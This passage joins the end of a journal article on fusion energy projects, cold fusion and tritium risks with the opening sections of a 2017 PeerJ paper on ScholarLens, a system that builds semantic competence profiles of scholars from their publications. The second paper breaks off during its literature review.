8 is needed for fusion, and in theory high enough to allow nuclear fusion of hydrogen with heavier elements such as lithium or boron. XXI. OTHER FUSION PROJECTS There is a considerable amount of research into many other fusion projects at various stages of development. Lockheed CFR. Lockheed Martin at its so-called ‘skunk works’ is developing a Compact Fusion Reactor(CFR) which uses conventional D-T plasma in evacuated containment but confines it differently. Instead of constraining the plasma within tubular rings, a series of superconducting coils will generate a new magnetic-field geometry in which the plasma is held within the broader confines of the entire reaction chamber. The energy is supplied by radiofrequency heating. Superconducting magnets within the coils will generate a magnetic field around the outer border of the chamber. The aim is to go to plasma pressure being as great as confining pressure at high enough temperature for ignition and net energy yield. Heat exchangers in the reactor wall would convey energy to a gas turbine. It has progressed to a magentised ion confinement experiment, but has some way to go before any prototype, which they claim will be very much smaller than conventional designs such as the ITER tokamak. Italy's National Agency for New Technologies, Energy and Sustainable Economic Development (ENEA) is developing a small tokamak reactor by the name of Ignitor. Under an Italian-Russian agreement signed in May 2010, a reactor will be assembled in Italy and installed at the Kurchatov Institute's Troitsk Institute for Innovation and Fusion Research (TRINITI) near Moscow [7] . An alternative to using powerful lasers for inertial confinement fusion is 'heavy ion fusion', where high- energy particles from an accelerator are focused using magnetic fields onto the fusion target. The NDCX- II(Neutralized Drift Compression Experiment II) accelerator has been used for heavy ion fusion experiments since 2012 at Lawrence Berkeley National Laboratory. It is being expanded to deliver short intense pulses of ion beams with kinetic energy of 1.2 MeV. High-energy-density physics (HEDP) experiments with laboratory plasmas is a growing part of inertial fusion energy (IFE) physics. LPP Fusion (Lawrenceville Plasma Physics) is a US enterprise developing aleuronic fusion using a dense plasma focus device (DPF or focus fusion) and hydrogen-boron fuel. The hydrogen and boron (B-11) as plasma fuse at high temperature to form a pulsed beam of helium nuclei without emitting neutrons. (The boron and hydrogen combine to produce a brief intermediate carbon-12 atom which rapidly decays to three alpha particles.) This charged high-energy ion beam generates electricity as it passes through a series of coils similar to a transformer, at 80% efficiency. The balance of energy is as by-product X-rays which are captured in an array of photoelectric receptors. LPP Fusion has achieved electron energies of 400 keV. Another line of fusion research using lasers also involves fusing hydrogen and boron-11 (HB11) to produce helium nuclei, which continue the chain reaction from boron. One laser generates a powerful magnetic confinement field in a coil to trap the fusion reaction in a small area for a nanosecond, while a second more powerful laser triggers the nuclear fusion process. Early HB11 fusion trials at the Prague Asterix Laser System, using high-energy iodine lasers, have generated more energy than needed to trigger the fusion process. The Polywell('polyhedron' combined with 'potential well')deviceconsists of magnetic coils arranged in a polyhedral configuration of six sides, forming a cube. A cloud of electrons is confined in the middle of the device so as to be able to accelerate and confine the positive ions to be fused. This electrostatic confinement concept differs from traditional magnetic confinement because the fields do not need to confine ions– only electrons. EMC2 Fusion Development Corporation has been researching the Polywell concept and looking at hydrogen and boron as fuel for aneutronic fusion. This followed some years of development by the US Navy, using deuterium fuel. General Fusionis one of a number of private efforts to develop a commercial fusion power plant. The company’s magnetized target fusion (MTF) approach generates a compact toroid plasma in an injector, containing and compressing it using a magnetic field before injecting it into a spherical compression chamber. The chamber holds a liquid lead-lithium liner which is pumped to create a vortex, into which the plasma target is injected. A synchronized array of pistons firing simultaneously creates a spherical compression wave in the liquid metal, compressing the plasma target and heating it to fusion conditions. Founded in Canada in 2002, General Fusion is funded by a syndicate of private investors, energy venture capital companies, sovereign wealth funds and the Canadian government’s Sustainable Development Technology Canada (SDTC) fund. A https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#References International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 9 further government grant was announced in October 2018, from the Strategic Innovation Fund. The company has demonstrated milestones including creating 200-300 eV magnetized spheromak plasmas and confining them for over 500 µs. Much of current work underway on MTF is derived from programmes at the Soviet Kurchatov Institute of Atomic Energy, under E. P. Velikhov, circa 1970. This inspired the LINUS project at the Naval Research Laboratory in the USA, and later the fast-liner project at Los Alamos. Tokamak Energyin the UK is a private company developing a spherical tokamak, and hopes to commercialize this by 2030. The company grew out of Culham laboratory, home to JET, and its technology revolves around high temperature superconducting (HTS) magnets, which allow for relatively low-power and small-size devices, but high performance and potentially widespread commercial deployment. Its first tokamak with exclusively HTS magnets – the ST25 HTS, Tokamak Energy's second reactor – demonstrated 29 hours' continuous plasma during the Royal Society Summer Science Exhibition in London in 2015, a world record. The next reactor is the ST40 at Milton Park in Oxfordshire, which achieved first plasma in April 2017. It isexpected to produce plasma temperatures of 15 million degrees Celsius– hotter than the centre of the Sun in 2017 after the commissioning of further magnetic coils. "The ST40 is designed to achieve 100 million degrees C and get within a factor of ten of energy break-even conditions. To get even closer to break-even point, the plasma density, temperature and confinement time then need to be fine- tuned.” The company is working with Princeton Plasma Physics Laboratory on spherical tokamaks, and with the Plasma Science and Fusion Centre at MIT on HTS magnets. It aims to achieve commercial scale fusion power by 2030. XXII. COLD FUSION In March 1989, spectacular claims were made for another approach, when two researchers, in the USA (Stanley Pons) and the UK (Martin Fleischmann), claimed to have achieved fusion in a simple tabletop apparatus working at room temperature. 'N-Fusion', or 'cold fusion', involves the electrolysis of heavy water using palladium electrodes on which deuterium nuclei are said to concentrate at very high densities. The researchers claimed that heat – which could only be explained in terms of nuclear processes – was produced, as well as fusion byproducts, including helium, tritium and neutrons. Other experimenters failed to replicate this, however, and most of the scientific community no longer considers it a real phenomenon. XXIII. LOW-ENERGY NUCLEAR REACTIONS (LENR) Initiated by claims for ‘cold fusion’, research at the nanotechnology level is continuing on low-energy nuclear reactions (LENR) which apparently use weak nuclear interactions (rather than strong force as in nuclear fission or fusion) to create low-energy neutrons, followed by neutron capture processes resulting in isotopic change or transmutation, without the emission of strong prompt radiation. LENR experiments involve hydrogen or deuterium permeation through a catalytic layer and reaction with a metal. Researchers report that energy is released, though on any reproducible basis, very little more than is input. The main practical example is hydrogen plus nickel powder evidently giving more heat than can be explained on any chemical basis. The Japanese government is sponsoring LENR research– notably a nano-metal hydrogen energy project (MHE)– through its New Energy and Industrial Technology Development Organization (NEDO), and Mitsubishi is also active in research. XXIV. CONCLUSION The use of fusion power plants could substantially reduce the environmental impacts of increasing world electricity demands since, like nuclear fission power, they would not contribute to acid rain or the greenhouse effect. Fusion power could easily satisfy the energy needs associated with continued economic growth, given the ready availability of fuels. There would be no danger of a runaway fusion reaction as this is intrinsically impossible and any malfunction would result in a rapid shutdown of the plant. However, although fusion does not generate long- lived radioactive products and the unburned gases can be treated on site, there would a short- to medium-term radioactive waste problem due to activation of the structural materials. Some component materials will become radioactive during the lifetime of a reactor, due to bombardment with high-energy neutrons, and will eventually become radioactive waste. The volume of such waste would be similar to the corresponding volumes from fission reactors. However, the long-term radiotoxicity of the fusion wastes would be considerably lower than that from actinides in used fission fuel, and the activation product wastes would be International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 10 handled in much the same way as those from fission reactors with some years of operation. [8] . There are also other concerns, principally regarding the possible release of tritium into the environment. It is radioactive and very difficult to contain since it can penetrate concrete, rubber and some grades of steel. As an isotope of hydrogen, it is easily incorporated into water, making the water itself weakly radioactive. With a half-life of about 12.3 years, the presence of tritium remains a threat to health for about 125 years after it is created, as a gas or in water, if at high levels. It can be inhaled, absorbed through the skin or ingested. Inhaled tritium spreads throughout the soft tissues and tritiated water mixes quickly with all the water in the body. Although there is only a small inventory of tritium in a fusion reactor – a few grams – each could conceivably release significant quantities of tritium during operation through routine leaks, assuming the best containment systems. An accident could release even more. This is one reason why long-term hopes are for the deuterium-deuterium fusion process, dispensing with tritium. While fusion power clearly has much to offer when the technology is eventually developed, the problems associated with it also need to be addressed if it is to become a widely used future energy source. REFERENCES [1] Fusion Research: An Energy Option for Europe's Future, Directorate- General for Research, European Commission, 2007 (ISBN: 9279005138) [2] Statement by Dr. Raymond L. Orbach, Under Secretary for Science and Director, Office of Science, US Department of Energy (22 May 2008) [3] National Ignition Facility achieves unprecedented 1 megajoule laser shot, Lawrence Livermore National Laboratory news release (27 January 2010) [4] LIFE: Clean Energy from Nuclear Waste page on Lawrence Livermore National Laboratory website (www.llnl.gov) [5] Z produces fusion neutrons, Sandia scientists confirm, Sandia National Laboratories news release (7 April 2003) [6] Sandia’s Z machine exceeds two billion degrees Kelvin, Sandia National Laboratories news release (8 March 2006) [7] New project aims for fusion ignition, Massachusetts Institute of Technology news (10 May 2010) New record for fusion, MIT News (14 October 2016) [8] Safety and Environmental Impact of Fusion, I. Cook, G. Marbach, L. Di Pace, C. Girard, N. P. Taylor, EUR (01) CCE-FU / FTC 8/5 (April 2001) https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#References http://web.mit.edu/newsoffice/2010/fusion-ignition-0510.html work_vd6oruexsvf4fikunggshpi4vm ---- Submitted 19 July 2016 Accepted 5 June 2017 Published 3 July 2017 Corresponding author Bahar Sateli, sateli@semanticsoftware.info Academic editor Kathryn Laskey Additional Information and Declarations can be found on page 35 DOI 10.7717/peerj-cs.121 Copyright 2017 Sateli et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS ScholarLens: extracting competences from research publications for the automatic generation of semantic user profiles Bahar Sateli1, Felicitas Löffler2, Birgitta König-Ries2 and René Witte1 1 Semantic Software Lab, Department of Computer Science and Software Engineering, Concordia University, Montreal, Quebec, Canada 2 Heinz-Nixdorf-Chair for Distributed Information Systems, Department of Mathematics and Computer Science, Friedrich Schiller University Jena, Jena, Germany ABSTRACT Motivation. Scientists increasingly rely on intelligent information systems to help them in their daily tasks, in particular for managing research objects, like publications or datasets. The relatively young research field of Semantic Publishing has been addressing the question how scientific applications can be improved through semantically rich representations of research objects, in order to facilitate their discovery and re-use. To complement the efforts in this area, we propose an automatic workflow to construct semantic user profiles of scholars, so that scholarly applications, like digital libraries or data repositories, can better understand their users’ interests, tasks, and competences, by incorporating these user profiles in their design. To make the user profiles sharable across applications, we propose to build them based on standard semantic web technologies, in particular the Resource Description Framework (RDF) for representing user profiles and Linked Open Data (LOD) sources for representing competence topics. To avoid the cold start problem, we suggest to automatically populate these profiles by analyzing the publications (co-)authored by users, which we hypothesize reflect their research competences. Results. We developed a novel approach, ScholarLens, which can automatically generate semantic user profiles for authors of scholarly literature. For modeling the competences of scholarly users and groups, we surveyed a number of existing linked open data vocabularies. In accordance with the LOD best practices, we propose an RDF Schema (RDFS) based model for competence records that reuses existing vocabularies where appropriate. To automate the creation of semantic user profiles, we developed a complete, automated workflow that can generate semantic user profiles by analyzing full-text research articles through various natural language processing (NLP) techniques. In our method, we start by processing a set of research articles for a given user. Competences are derived by text mining the articles, including syntactic, semantic, and LOD entity linking steps. We then populate a knowledge base in RDF format with user profiles containing the extracted competences.We implemented our approach as an open source library and evaluated our system through two user studies, resulting in mean average precision (MAP) of up to 95%. As part of the evaluation, we also analyze the impact of semantic zoning of research articles on the accuracy of the resulting profiles. Finally, we demonstrate how these semantic user profiles can be applied in a number of use cases, including article ranking for personalized search and finding scientists competent in a topic —e.g., to find reviewers for a paper. How to cite this article Sateli et al. (2017), ScholarLens: extracting competences from research publications for the automatic generation of semantic user profiles. PeerJ Comput. Sci. 3:e121; DOI 10.7717/peerj-cs.121 https://peerj.com mailto:sateli@semanticsoftware.info https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.121 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.121 Availability. All software and datasets presented in this paper are available under open source licenses in the supplements and documented at http://www.semanticsoftware. info/semantic-user-profiling-peerj-2016-supplements. Additionally, development releases of ScholarLens are available on our GitHub page: https://github.com/ SemanticSoftwareLab/ScholarLens. Subjects Human-Computer Interaction, Artificial Intelligence, Data Mining and Machine Learning, Digital Libraries Keywords Natural language processing, Semantic user profile, Semantic publishing, Scholarly user modeling, Linked open data INTRODUCTION Researchers increasingly leverage intelligent information systems for managing their research objects, like datasets, publications, or projects. An ongoing challenge is the overload scientists face when trying to identify relevant information, for example when using a web-based search engine: while it is easy to find numerous potentially relevant results, evaluating each of these is still performed manually and thus very time-consuming. We argue that smarter scholarly applications require not just a semantically rich representation of research objects, but also of their users: By understanding a scientist’s interests, competences, projects and tasks, intelligent systems can deliver improved results, e.g., by filtering and ranking results through personalization algorithms (Sieg, Mobasher & Burke, 2007). So-called user profiles (Brusilovsky & Millán, 2007) have been adopted in domains like e-learning, recommender systems or personalized news portals (we provide a brief background on user profiling in the ‘Background’). Increasingly, they also receive more and more attention in scientific applications, such as expertise retrieval systems. Constructing such user models automatically is still a challenging task and even though various approaches have already been proposed, a semantic solution based on Linked Open Data (LOD) (Heath & Bizer, 2011) principles is still missing. We show that a semantically rich representation of users is crucial for enabling a number of advanced use cases in scholarly applications. One of our central points is that a new generation of semantic user profile models are ideally built on standard semantic web technologies, as these make the profiles accessible in an open format to multiple applications that require deeper knowledge of a user’s competences and interests. In the ‘Literature Review’, we analyze a number of existing LOD vocabularies for describing scholars’ preferences and competences. However, they all fall short when it comes to modeling a user’s varying degrees of competence in different research topics across different projects. We describe our solution for scholarly user models in the ‘Design’. Bootstrapping such a user profile is an infamous issue in recommendation approaches, known as the cold start problem, as asking users to manually create possibly hundreds of entries for their profile is not realistic in practice. Our goal is to be able to create an accurate profile of a scientist’s competences, which we hypothesize can be automatically calculated Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 2/39 https://peerj.com http://www.semanticsoftware.info/semantic-user-profiling-peerj-2016-supplements http://www.semanticsoftware.info/semantic-user-profiling-peerj-2016-supplements https://github.com/SemanticSoftwareLab/ScholarLens https://github.com/SemanticSoftwareLab/ScholarLens http://dx.doi.org/10.7717/peerj-cs.121 Figure 1 This diagram shows a high-level overview of our approach to semantic user profiling: users can bootstrap their profiles by providing a set of their (co-)authored publications. The extracted knowl- edge is then stored in a knowledge base that can be incorporated in various scholarly applications. Re- searchers can then obtain personalized services through applications leveraging the semantic user profiles. based on the publications of each user. Towards this end, we developed a novel NLP-based method for analyzing full-text research articles to extract an author’s competences and constructing semantic user profiles in a linked open data format for automatic knowledge base construction. Our ideas are implemented in ScholarLens library, which we believe is the first open source library that facilitates the automatic construction of scholarly user profiles. The design and implementation of ScholarLens are detailed in ‘Design’ and ‘Implementation’, respectively. A high-level overview of our approach is illustrated in Fig. 1. To evaluate our profile generation approach, we performed two user studies with ten and twenty-five scientists from various research groups across Europe and North America. The participants were provided with two different user profiles each, which were automatically generated based on their publications: one based on the articles’ full texts, the second restricted to rhetorical entities (REs), like the claims and contributions in a paper (Sateli & Witte, 2015). In each study, we asked the participants to evaluate the generated top-N competence entries in their user profiles. The results, provided in the ‘Evaluation’, show that our approach can automatically generate user profiles with a precision of up to 95% (Mean Average Precision for top-10 competences). Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 3/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Finally, we illustrate in the ‘Application Examples’ how semantic user profiles can be leveraged by scholarly information systems in a number of use cases, including a competence analysis for a user (e.g., for finding reviewers for a new paper) and re-ranking of article search results, based on a user’s profile. BACKGROUND In this section, we provide background information on user profiling, competence management and its applications. We also briefly introduce semantic publishing and its connections with natural language processing (NLP) techniques. User profiling and personalization A user profile is an instance of a user model that contains either a user’s characteristics, such as knowledge about a topic, interests and backgrounds, or focuses on the context of a user’s work, e.g., location and time (Brusilovsky & Millán, 2007). Depending on the application offering personalized content, different features have to be taken into account when modeling user profiles. For instance, educational learning systems typically model a user’s knowledge and background, whereas recommender systems and search applications are more focused on a user’s interests. Constructing user profiles requires collecting user information over an extended period of time. This gathering process is called user profiling and distinguishes between explicit and implicit user feedback (Gauch et al., 2007). Explicit user feedback actively requests interests from a user, whereas implicit user feedback derives preferences from the user’s activities. Commonly used implicit profiling techniques observe the user’s browsing behavior and extract preferences from web or query logs, analyze the browser history and derive interest weights from the numbers of clicks or the time spent on a page. According to findings in Gauch et al. (2007), there is no significant evidence that an explicit user feedback mechanism results in better personalized content than implicitly recorded user information. Therefore, personalized applications nowadays mainly employ implicit profiling techniques, since they are less intrusive from a user’s perspective. In the context of scholarly applications, user profiles have been used in ad-hoc approaches, such as the expertise retrieval system used at Tilburg University (UvT) (https: //www.tilburguniversity.edu/), academic search engines like AMiner (https://aminer.org) or personalized paper recommendations in Google Scholar (https://scholar.google.com). The most dominant representation of user characteristics in this type of application is a weighted vector of keywords. This simple mathematical description permits classical information filtering algorithms, such as cosine similarity (Manning, Raghavan & Schütze, 2008), in order to measure item-to-item, user-to-user and item-to-user similarity. Competence management E-learning applications were the earliest systems to provide personalized content based on a user’s background knowledge and skill sets. The identified competence gaps were used to find appropriate learning strategies to gain the required knowledge to pass a course or to fulfill a certain task. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 4/39 https://peerj.com https://www.tilburguniversity.edu/ https://www.tilburguniversity.edu/ https://aminer.org https://scholar.google.com http://dx.doi.org/10.7717/peerj-cs.121 According to the definition in HR-XML-Consortium (2004), a competency is ‘‘A specific, identifiable, definable, and measurable knowledge, skill, ability and/or other deployment- related characteristic (e.g., attitude, behavior, physical ability) which a human resource may possess and which is necessary for, or material to, the performance of an activity within a specific business context’’. Draganidis & Mentzas (2006) further analyzed the term competency and outlined four dimensions a competence can be described along: category (generic term for a group of similar skills), competency (the description of the competence term), definition (user scenarios that illustrate this competence) and demonstrated behaviour (explanations that clarify if the desired competency has been achieved). The terms competence and competency are usually used synonymously. However, Teodorescu (2006) argues that there is a subtle difference in their meaning: while competency is mainly focused on the description of skills a person is supposed to possess in order to achieve a certain target, the term competence actually points to the measurement of skills to determine a certain level of expertise. While we appreciate this distinction, we consider the terms as synonymous in this article, but for the sake of consistency use the term competence. Semantic publishing The emerging research domain of Semantic Publishing aims at making scientific knowledge accessible to both humans and machines. Semantic technologies have become increasingly important in the management of research objects. They enable automated systems to understand the meaning (semantics) and infer additional knowledge from published documents and data (Berners-Lee & Hendler, 2001; Shadbolt, Hall & Berners-Lee, 2006). Essential building blocks for the creation of structured, meaningful web content are information extraction and semantic annotations. These annotations are added to documents using special markups with predefined meanings to explicitly mark their structure (e.g., different sections of an article) and semantics (e.g., a publication’s contributions, methods, or application domains) (Sateli & Witte, 2015). The semantically annotated documents can then be used in a multitude of applications, for example, in information retrieval systems, by finding specific document sections or measuring the similarity of different articles’ contributions. In recent years, the semantic publishing community increasingly built and adopted controlled vocabularies, based on Semantic Web technologies, for describing research objects. However, despite the promises of better knowledge access (Berners-Lee & Hendler, 2001; Shotton, 2009), the manual annotation of existing research literature is prohibitively expensive for a wide-spread adoption. Consequently, a significant focus of research in the semantic publishing domain is dedicated to finding automatic approaches to annotate the wealth of existing scientific literature with shared vocabularies, based on approaches from the natural language processing and text mining domains. LITERATURE REVIEW We focus our review on two core aspects: firstly, existing semantic vocabularies that describe scholars in academic institutions with their publications and competences, in Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 5/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 order to establish semantic user profiles. And secondly, we examine existing approaches for automatic profile generation through NLP methods. Vocabularies for scholarly user modeling In the area of user modeling, a multitude of semantic approaches have emerged in the last decade that go beyond representing users interests with keywords in favour of using concepts of domain ontologies, for example in a vector-based model (Sieg, Mobasher & Burke, 2007; Cantador & Castells, 2011). In addition to providing a common understanding of domain knowledge, using semantic technologies also fosters the evolution towards more generic user models. An important goal of generic user modeling is facilitating software development and promoting reusability (Kobsa, 2001) of profiles across applications or platforms. Semantic web technologies, such as the representation of user characteristics in an RDF or Web Ontology Language (OWL) (https://www.w3.org/OWL/) compliant format can leverage this idea. In the following section, we review different proposals for generic user and competence modeling with semantic web vocabularies. Furthermore, we discuss scholarly ontologies that describe users, institutions and publications in the scientific domain. Vocabularies for competence modeling From Paquette (2007)’s perspective, competences are phrases that connect a user’s skills and positions to knowledge. This idea is reflected in his proposed competence ontology containing five main concepts, namely, competence statement, competence, skill, knowledge entity and resource. Paquette further developed his ontology into sub-ontologies for skills and performance indicators that could be incorporated in ontology-driven e-learning systems. However, Paquette’s ontology was designed to be used within his proposed software framework and is essentially missing connections to other existing ontologies. Another ontology approach is proposed by Fazel-Zarandi & Fox (2012). Based on the assumption that someone who possesses appropriate skills is able to perform certain tasks, the ontology models skills at a certain level of proficiency and permits inter-linking with activities and knowledge fields. The IntelLEO Competence Ontology (Jovanovic et al., 2011) aggregates the findings from different competence ontologies (Schmidt & Kunzmann, 2006; Sandberg, 2000; Sitthisak, Gilbert & Davis, 2009; Paquette, 2003; Sicilia, 2005; Sampson & Fytros, 2008) and defines a competence with respect to the corresponding domain-topic, skill and competence level. The IntelLEO ontology permits defining a competence as a prerequisite for another competence and provides the vocabulary for describing the process of gaining that specific skill. A competence record, hence, comprises a certain competence level, the source where the acquired competence has been achieved, as well as the date and methods that have been utilized to verify the acquisition. Vocabularies for semantic user profiles GUMO (Heckmann et al., 2005) was the first generic user model approach, designed as a top-level ontology for universal use. This OWL-based ontology focuses on describing a user in a situational context, offering several classes for modeling a user’s Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 6/39 https://peerj.com https://www.w3.org/OWL/ http://dx.doi.org/10.7717/peerj-cs.121 personality, characteristics and interests. Background knowledge and competences are considered only to a small degree. In contrast, the IntelLEO (http://intelleo.eu/) ontology framework is strongly focused on personalization and enables describing preferences, tasks and interests. The IntelLEO framework consists of multiple RDFS-based ontologies, including vocabularies for user and team modeling, as well as competences as we described in ‘Vocabularies for competence modeling’. The IntelLEO vocabularies are inter-linked with other user model ontologies, such as Friend of a Friend (FOAF) (http://www.foaf-project.org/). Thanks to the simplicity and inter-linking of FOAF to other Linked Open Vocabularies (LOVs), it has become very popular in recent years and is integrated in numerous personalized applications (Celma, 2006; Raad, Chbeir & Dipanda, 2010; Orlandi, Breslin & Passant, 2012). FOAF’s RDF-based vocabulary provides for describing basic user information with predefined entities, such as name, email, homepage, and interests, as well as modeling both individuals and groups in social networks. However, FOAF does not provide comprehensive classes for describing preferences and competences, so that it would become directly usable within a scholarly application context. Other ontologies aiming to unify user modeling vocabularies in semantic web applications are the Scrutable User Modeling Infrastructure (SUMI) (Kyriacou, Davis & Tiropanis, 2009) and the ontology developed by Golemati et al. (2007). Besides general user information such as contact, address, preferences, education and profession, (Golemati et al., 2007) also provides a vocabulary for a user’s activities in a given timeline. In contrast, SUMI (Kyriacou, Davis & Tiropanis, 2009) models user interests from the profiling perspective, which can be either explicitly given by the user or implicitly recorded by the system. The user model in SUMI is divided into four categories. The first two categories contain the manually provided user information: (i) generic personal user data and (ii) interests that are only specific for a certain application, e.g., preferences that are only applicable within the ‘Amazon.com’ platform. SUMI automatically stores the recorded user preferences in two further categories: (i) generic application information that are valid across different service providers and (ii) application-specific data that is only used for a certain service. Neither SUMI nor Golemati’s approach are inter-linked with other vocabularies, and they are also not maintained anymore. Vocabularies for modeling scholars For modeling scholars in the scientific domain, VIVO (http://vivoweb.org/ontology/core#) (Börner et al., 2012) is the most prominent approach that has been used in numerous applications (http://duraspace.org/registry/vivo). It is an open source suite of web applications and ontologies used to model scholarly activities across an academic institution. However, VIVO offers no support for content adaptation, due to missing classes for user interests, preferences and competences. Another vocabulary modeling scientists and publications in research communities is the Semantic Web for Research Communities (SWRC) (http://ontoware.org/swrc/), which was developed to provide an ontological infrastructure for semantic information portals (Gonzalez & Stumme, 2002; Haase et al., 2006). The Semantic Web Portal Ontology (SWPO) (http://sw-portal.deri.org/ontologies/swportal) uses the FOAF, Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 7/39 https://peerj.com http://intelleo.eu/ http://www.foaf-project.org/ http://vivoweb.org/ontology/core# http://duraspace.org/registry/vivo http://ontoware.org/swrc/ http://sw-portal.deri.org/ontologies/swportal http://dx.doi.org/10.7717/peerj-cs.121 Table 1 Comparison of existing user model and scholarly vocabularies: High denotes that the vocabulary provides numerous classes and prop- erties for the description of that entity. Medium means several classes and properties are available to define that entity and Low states that there is only one class and property available. n/a indicate that this entity is not covered by the vocabulary. Name Coverage Scientist Role Document Research object Project Competence Task Interest VIVO High High High Medium Low n/a n/a Low LSC Low n/a Medium Low Low n/a n/a Low SWPO Medium n/a Medium n/a Low n/a Low Low SWRC Medium Medium Medium n/a Low n/a n/a n/a AIISO Medium High n/a n/a Low n/a n/a Low FOAF Low n/a Low n/a Low n/a n/a Low GUMO Low Low n/a n/a n/a Medium n/a High IntelLEO Low Low Low n/a Low High Medium Medium (http://purl.org/net/nknouf/ns/bibtex), Time (http://www.wsmo.org/ontologies/ dateTime#) and DCMI Metadata (http://purl.org/dc/elements/1.1/) vocabularies to model researchers with their personal and scholarly activities, like publications and conferences. The goal of SWPO was to design a vocabulary to use within a portal application, where researchers working within a common scientific area can communicate with each other. The Linked Science Core Vocabulary (LSC) (http://linkedscience.org/lsc/ns#) provides a set of vocabularies for describing and interlinking researchers, publications and scientific data. LSC is very limited in its expressiveness and uses a small number of classes for describing research rhetoric elements in publications (e.g., hypothesis, data, method), rather than modeling researchers and their context. AIISO, the Academic Institution Internal Structure Ontology (http://purl.org/vocab/aiiso/schema), is a linked open vocabulary for describing the roles people play within various internal entities of an academic institution through its integration with FOAF and participation vocabularies. One of the use cases we had in mind when designing our ScholarLens methodology was its application within sophisticated information filtering systems for scholars that consider a user’s research background. Therefore, we explored the generic user models and scholarly ontologies reviewed above, in order to determine how well they can express features of scientific user modeling. The outcome of our study is summarized in Table 1: Scientist describes how well general user information about a scholar including name, address, affiliation, department and contact details can be defined. The ability to represent a user’s roles, e.g., a student, a post-doc or a professor, is expressed with Role. Document refers to all kinds of scholarly publications and Research Object comprises the possibility to define all different types of data used or produced in scientific workflows. A user might be involved in different research projects, which is addressed with the concept Project. Competence points to the possibility of characterizing a user’s expertise; whereas Task covers how well a user’s responsibilities can be described. Interest refers to a user’s preferences and interests for certain topics. A comprehensive description of an academic user is provided by VIVO. This ontology is widely used in applications at academic institutions for representing general user Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 8/39 https://peerj.com http://purl.org/net/nknouf/ns/bibtex http://www.wsmo.org/ontologies/dateTime# http://www.wsmo.org/ontologies/dateTime# http://purl.org/dc/elements/1.1/ http://linkedscience.org/lsc/ns# http://purl.org/vocab/aiiso/schema http://dx.doi.org/10.7717/peerj-cs.121 information and specific research areas and background. However, it does not provide for personalization, due to missing classes for user interests and preferences. In contrast to VIVO, the IntelLEO ontology framework is strongly focused on personalization and offers several classes for preferences, tasks and competences. The most prominent, but also most basic user model ontology is FOAF, which provides only very few classes and properties for user modeling. Implicit profile generation Generic user modeling requires new methods for user profiling. Merely observing a user’s browsing behavior is not enough for various tasks a scholar is involved in. More complex user information can be obtained from, e.g., context resources, such as affiliations a scholar is associated with, but also from content sources, for instance, a user’s publications. Utilizing NLP techniques in user modeling has quite a long history (Zukerman & Litman, 2001) and has also become important in recent years in Information Retrieval (IR) for extracting named entities from scientific papers in order to profile scholars and to find an expert in a certain topic. Therefore, in the following subsections we focus on related work in expert profiling based on publications. Since social media offers an abundance of user information, we also report on implicit profiling approaches using data from social networks that are targeted at general users, rather than only scholars. Expert profiling in information retrieval Certain tasks in research require finding experts with adequate background knowledge and skills. This so-called Expertise Retrieval gained a lot of attention in the Information Retrieval community (Balog et al., 2012), in particular with the expert finding task at the Enterprise Track of the NIST (2009) competition, which leveraged the idea of finding the right person with proper competences. Based on a corpus of different kinds of documents, such as web pages, source code files and emails from mailing-lists, the task was to return a ranked list of persons with appropriate background knowledge in a given domain. However, as Balog & De Rijke (2007) point out, just matching people and domains in isolation is not enough: expert seekers often want to retrieve context information about a scholar’s research network. The information with whom a person corresponds or collaborates might provide evidence on his or her establishment in the research community. Thus, it is getting more and more important to create comprehensive expert profiles, rather than just finding experts in documents for a given topic. Balog and Rijke clearly distinguish between expert finding and expert profiling. According to their definition, expert finding addresses the problem of finding experts for certain topics, based on a given set of documents, while expert profiling aims at creating profiles of individuals. The main goal in expert profiling is to establish a description of a person’s competences and his or her social network. They divide the task of expert profiling into two stages: extracting topics and determining a person’s competence in that topic. Here, competence is modeled as an association between query terms (topics) and candidate experts, where associations are mainly established based on textual evidence. A simple association would be the authorship of publications, where the content of the papers are the textual evidence of the candidate’s Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 9/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 expertise: ‘‘The stronger the association between a person and a topic, the likelier it is that the person is an expert on that topic’’ (Balog et al., 2012). Different approaches have emerged in expertise retrieval for modeling these associations. According to Balog et al. (2012), they can be grouped into five categories: generative probabilistic models, such as language or topic models, which determine the likelihood that a given topic is linked to a person, discriminative models computing the conditional probability that a tuple of topic and candidate expert is relevant, voting models that describe the generation of associations as a voting process, where scores from different sources are combined, graph-based models that analyze relationships among people and documents and describe associations along nodes (people and documents) and directed edges (conditions), as well as other models covering the broad spectrum of other approaches for modeling associations. As Balog et al. (2012) point out, comparing all of the above mentioned approaches is a difficult task, since they are all influenced by different variables and components. Furthermore, they are often built into larger applications, where only the final system was evaluated. Therefore, Balog et al. (2012) only analyzed the range of the best score from the main test collections: W3C (http://research.microsoft.com/en-us/um/people/nickcr/w3c- summary.html) and CERC (http://es.csiro.au/cerc/) (both from TREC) and the UvT Expert Collection (http://ilps.science.uva.nl/resources/tu-expert-collection/) which is a collection of public data from about 1,168 experts from UvT. The Mean Average Precision (MAP) scores in the W3C collection varies between 0.20 and 0.30 on a query set from 2005 and between 0.45 and 0.65 on the dataset from the 2006 TREC competition. It needs to be considered that in this TREC collection, no actual ‘relevance assessment’ has been made, as the membership of the W3C people in different working groups was used to derive that a person has expertise in a certain topic. The MAP values from the CERC collection range from 0.45 to 0.60, whereas the MAP values for the expert 